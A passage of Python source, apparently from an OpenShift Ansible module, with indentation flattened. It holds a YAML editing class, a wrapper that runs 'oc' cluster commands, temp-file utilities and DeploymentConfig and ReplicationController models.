# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path, index=None, value=None):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, index, value, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
'value=[{}] type=[{}]'.format(value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is None:
return (False, self.yaml_dict)
# When path equals "" it is a special case.
# "" refers to the root of the document
# Only update the root path (entire document) when its a list or dict
if path == '':
if isinstance(result, list) or isinstance(result, dict):
self.yaml_dict = result
return (True, self.yaml_dict)
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is not None:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.safe_load(str(invalue))
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
# There is a special case where '' will turn into None after yaml loading it so skip
if isinstance(inc_value, str) and inc_value == '':
pass
# If vtype is not str then go ahead and attempt to yaml load it.
elif isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.safe_load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming value. ' +
'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))
return inc_value
@staticmethod
def process_edits(edits, yamlfile):
'''run through a list of edits and process them one-by-one'''
results = []
for edit in edits:
value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
if edit.get('action') == 'update':
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(
Yedit.parse_value(edit.get('curr_value')),
edit.get('curr_value_format'))
rval = yamlfile.update(edit['key'],
value,
edit.get('index'),
curr_value)
elif edit.get('action') == 'append':
rval = yamlfile.append(edit['key'], value)
else:
rval = yamlfile.put(edit['key'], value)
if rval[0]:
results.append({'key': edit['key'], 'edit': rval[1]})
return {'changed': len(results) > 0, 'results': results}
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params):
'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=params['src'],
backup=params['backup'],
content_type=params['content_type'],
backup_ext=params['backup_ext'],
separator=params['separator'])
state = params['state']
if params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and state != 'present':
return {'failed': True,
'msg': 'Error opening file [{}]. Verify that the '.format(params['src']) +
'file exists, that it is has correct permissions, and is valid yaml.'}
if state == 'list':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['key']:
rval = yamlfile.get(params['key'])
return {'changed': False, 'result': rval, 'state': state}
elif state == 'absent':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['update']:
rval = yamlfile.pop(params['key'], params['value'])
else:
rval = yamlfile.delete(params['key'], params['index'], params['value'])
if rval[0] and params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': state}
elif state == 'present':
# check if content is different than what is in the file
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
params['value'] is None:
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
yamlfile.yaml_dict = content
# If we were passed a key, value then
# we enapsulate it in a list and process it
# Key, Value passed to the module : Converted to Edits list #
edits = []
_edit = {}
if params['value'] is not None:
_edit['value'] = params['value']
_edit['value_type'] = params['value_type']
_edit['key'] = params['key']
if params['update']:
_edit['action'] = 'update'
_edit['curr_value'] = params['curr_value']
_edit['curr_value_format'] = params['curr_value_format']
_edit['index'] = params['index']
elif params['append']:
_edit['action'] = 'append'
edits.append(_edit)
elif params['edits'] is not None:
edits = params['edits']
if edits:
results = Yedit.process_edits(edits, yamlfile)
# if there were changes and a src provided to us we need to write
if results['changed'] and params['src']:
yamlfile.write()
return {'changed': results['changed'], 'result': results['results'], 'state': state}
# no edits to make
if params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': state}
# We were passed content but no src, key or value, or edits. Return contents in memory
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
return {'failed': True, 'msg': 'Unkown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, edits=None, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
updated = False
if content is not None:
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
updated = True
elif edits is not None:
results = Yedit.process_edits(edits, yed)
if results['changed']:
updated = True
if updated:
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, name=None, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
elif name is not None:
cmd.append(name)
else:
raise OpenShiftCLIError('Either name or selector is required when calling delete.')
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
cmd.append('-p')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, name=None, selector=None, field_selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
if field_selector is not None:
cmd.append('--field-selector={}'.format(field_selector))
# Name cannot be used with selector or field_selector.
if selector is None and field_selector is None and name is not None:
cmd.append(name)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
# Ensure results are retuned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
cmd.append('--schedulable={}'.format(schedulable))
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
if grace_period:
cmd.append('--grace-period={}'.format(int(grace_period)))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
elif self.namespace is not None and self.namespace.lower() not in ['none', 'emtpy']: # E501
cmds.extend(['-n', self.namespace])
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"cmd": ' '.join(cmds)}
if output_type == 'json':
rval['results'] = {}
if output and stdout:
try:
rval['results'] = json.loads(stdout)
except ValueError as verr:
if "No JSON object could be decoded" in verr.args:
rval['err'] = verr.args
elif output_type == 'raw':
rval['results'] = stdout if output else ''
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if 'err' in rval or returncode != 0:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class Utils(object): # pragma: no cover
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(str(contents))
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get openshift version in Openshift 3.2
# By default "oc version in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
version = version[1:] # Remove the 'v' prefix
versions_dict[tech + '_numeric'] = version.split('+')[0]
# "3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = "{}.{}".format(*version.split('.'))
return versions_dict
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import rpm
transaction_set = rpm.TransactionSet()
rpmquery = transaction_set.dbMatch("name", "atomic-openshift")
return rpmquery.count() > 0
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self, ascommalist=''):
'''return all options as a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs'''
return self.stringify(ascommalist)
def stringify(self, ascommalist=''):
''' return the options hash as cli params in a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs '''
rval = []
for key in sorted(self.config_options.keys()):
data = self.config_options[key]
if data['include'] \
and (data['value'] is not None or isinstance(data['value'], int)):
if key == ascommalist:
val = ','.join(['{}={}'.format(kk, vv) for kk, vv in sorted(data['value'].items())])
else:
val = data['value']
rval.append('--{}={}'.format(key.replace('_', '-'), val))
return rval
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/deploymentconfig.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class DeploymentConfig(Yedit):
''' Class to model an openshift DeploymentConfig'''
default_deployment_config = '''
apiVersion: v1
kind: DeploymentConfig
metadata:
name: default_dc
namespace: default
spec:
replicas: 0
selector:
default_dc: default_dc
strategy:
resources: {}
rollingParams:
intervalSeconds: 1
maxSurge: 0
maxUnavailable: 25%
timeoutSeconds: 600
updatePercent: -25
updatePeriodSeconds: 1
type: Rolling
template:
metadata:
spec:
containers:
- env:
- name: default
value: default
image: default
imagePullPolicy: IfNotPresent
name: default_dc
ports:
- containerPort: 8000
hostPort: 8000
protocol: TCP
name: default_port
resources: {}
terminationMessagePath: /dev/termination-log
dnsPolicy: ClusterFirst
hostNetwork: true
nodeSelector:
type: compute
restartPolicy: Always
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
triggers:
- type: ConfigChange
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content=None):
''' Constructor for deploymentconfig '''
if not content:
content = DeploymentConfig.default_deployment_config
super(DeploymentConfig, self).__init__(content=content)
def add_env_value(self, key, value):
''' add key, value pair to env array '''
rval = False
env = self.get_env_vars()
if env:
env.append({'name': key, 'value': value})
rval = True
else:
result = self.put(DeploymentConfig.env_path, {'name': key, 'value': value})
rval = result[0]
return rval
def exists_env_value(self, key, value):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key and result['value'] == value:
return True
return False
def exists_env_key(self, key):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key:
return True
return False
def get_env_var(self, key):
'''return a environment variables '''
results = self.get(DeploymentConfig.env_path) or []
if not results:
return None
for env_var in results:
if env_var['name'] == key:
return env_var
return None
def get_env_vars(self):
'''return a environment variables '''
return self.get(DeploymentConfig.env_path) or []
def delete_env_var(self, keys):
'''delete a list of keys '''
if not isinstance(keys, list):
keys = [keys]
env_vars_array = self.get_env_vars()
modified = False
idx = None
for key in keys:
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
if idx:
modified = True
del env_vars_array[idx]
if modified:
return True
return False
def update_env_var(self, key, value):
'''place an env in the env var list'''
env_vars_array = self.get_env_vars()
idx = None
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
if idx:
env_vars_array[idx]['value'] = value
else:
self.add_env_value(key, value)
return True
def exists_volume_mount(self, volume_mount):
''' return whether a volume mount exists '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts:
return False
volume_mount_found = False
for exist_volume_mount in exist_volume_mounts:
if exist_volume_mount['name'] == volume_mount['name']:
volume_mount_found = True
break
return volume_mount_found
def exists_volume(self, volume):
''' return whether a volume exists '''
exist_volumes = self.get_volumes()
volume_found = False
for exist_volume in exist_volumes:
if exist_volume['name'] == volume['name']:
volume_found = True
break
return volume_found
def find_volume_by_name(self, volume, mounts=False):
''' return the index of a volume '''
volumes = []
if mounts:
volumes = self.get_volume_mounts()
else:
volumes = self.get_volumes()
for exist_volume in volumes:
if exist_volume['name'] == volume['name']:
return exist_volume
return None
def get_replicas(self):
''' return replicas setting '''
return self.get(DeploymentConfig.replicas_path)
def get_volume_mounts(self):
'''return volume mount information '''
return self.get_volumes(mounts=True)
def get_volumes(self, mounts=False):
'''return volume mount information '''
if mounts:
return self.get(DeploymentConfig.volume_mounts_path) or []
return self.get(DeploymentConfig.volumes_path) or []
def delete_volume_by_name(self, volume):
'''delete a volume '''
modified = False
exist_volume_mounts = self.get_volume_mounts()
exist_volumes = self.get_volumes()
del_idx = None
for idx, exist_volume in enumerate(exist_volumes):
if 'name' in exist_volume and exist_volume['name'] == volume['name']:
del_idx = idx
break
if del_idx != None:
del exist_volumes[del_idx]
modified = True
del_idx = None
for idx, exist_volume_mount in enumerate(exist_volume_mounts):
if 'name' in exist_volume_mount and exist_volume_mount['name'] == volume['name']:
del_idx = idx
break
if del_idx != None:
del exist_volume_mounts[idx]
modified = True
return modified
def add_volume_mount(self, volume_mount):
''' add a volume or volume mount to the proper location '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts and volume_mount:
self.put(DeploymentConfig.volume_mounts_path, [volume_mount])
else:
exist_volume_mounts.append(volume_mount)
def add_volume(self, volume):
''' add a volume or volume mount to the proper location '''
exist_volumes = self.get_volumes()
if not volume:
return
if not exist_volumes:
self.put(DeploymentConfig.volumes_path, [volume])
else:
exist_volumes.append(volume)
def update_replicas(self, replicas):
''' update replicas value '''
self.put(DeploymentConfig.replicas_path, replicas)
def update_volume(self, volume):
'''place an env in the env var list'''
exist_volumes = self.get_volumes()
if not volume:
return False
# update the volume
update_idx = None
for idx, exist_vol in enumerate(exist_volumes):
if exist_vol['name'] == volume['name']:
update_idx = idx
break
if update_idx != None:
exist_volumes[update_idx] = volume
else:
self.add_volume(volume)
return True
def update_volume_mount(self, volume_mount):
'''place an env in the env var list'''
modified = False
exist_volume_mounts = self.get_volume_mounts()
if not volume_mount:
return False
# update the volume mount
for exist_vol_mount in exist_volume_mounts:
if exist_vol_mount['name'] == volume_mount['name']:
if 'mountPath' in exist_vol_mount and \
str(exist_vol_mount['mountPath']) != str(volume_mount['mountPath']):
exist_vol_mount['mountPath'] = volume_mount['mountPath']
modified = True
break
if not modified:
self.add_volume_mount(volume_mount)
modified = True
return modified
def needs_update_volume(self, volume, volume_mount):
''' verify a volume update is needed '''
exist_volume = self.find_volume_by_name(volume)
exist_volume_mount = self.find_volume_by_name(volume, mounts=True)
results = []
results.append(exist_volume['name'] == volume['name'])
if 'secret' in volume:
results.append('secret' in exist_volume)
results.append(exist_volume['secret']['secretName'] == volume['secret']['secretName'])
results.append(exist_volume_mount['name'] == volume_mount['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'emptyDir' in volume:
results.append(exist_volume_mount['name'] == volume['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'persistentVolumeClaim' in volume:
pvc = 'persistentVolumeClaim'
results.append(pvc in exist_volume)
if results[-1]:
results.append(exist_volume[pvc]['claimName'] == volume[pvc]['claimName'])
if 'claimSize' in volume[pvc]:
results.append(exist_volume[pvc]['claimSize'] == volume[pvc]['claimSize'])
elif 'hostpath' in volume:
results.append('hostPath' in exist_volume)
results.append(exist_volume['hostPath']['path'] == volume_mount['mountPath'])
return not all(results)
def needs_update_replicas(self, replicas):
''' verify whether a replica update is needed '''
current_reps = self.get(DeploymentConfig.replicas_path)
return not current_reps == replicas
# -*- -*- -*- End included fragment: lib/deploymentconfig.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/replicationcontroller.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class ReplicationController(DeploymentConfig):
''' Class to model a replicationcontroller openshift object.
Currently we are modeled after a deployment config since they
are very similar. In the future, when the need arises we
will add functionality to this class.
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content):
''' Constructor for ReplicationController '''
super(ReplicationController, self).__init__(content=content)
# -*- -*- -*- End included fragment: lib/replicationcontroller.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_scale.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class OCScale(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self,
resource_name,
namespace,
replicas,
kind,
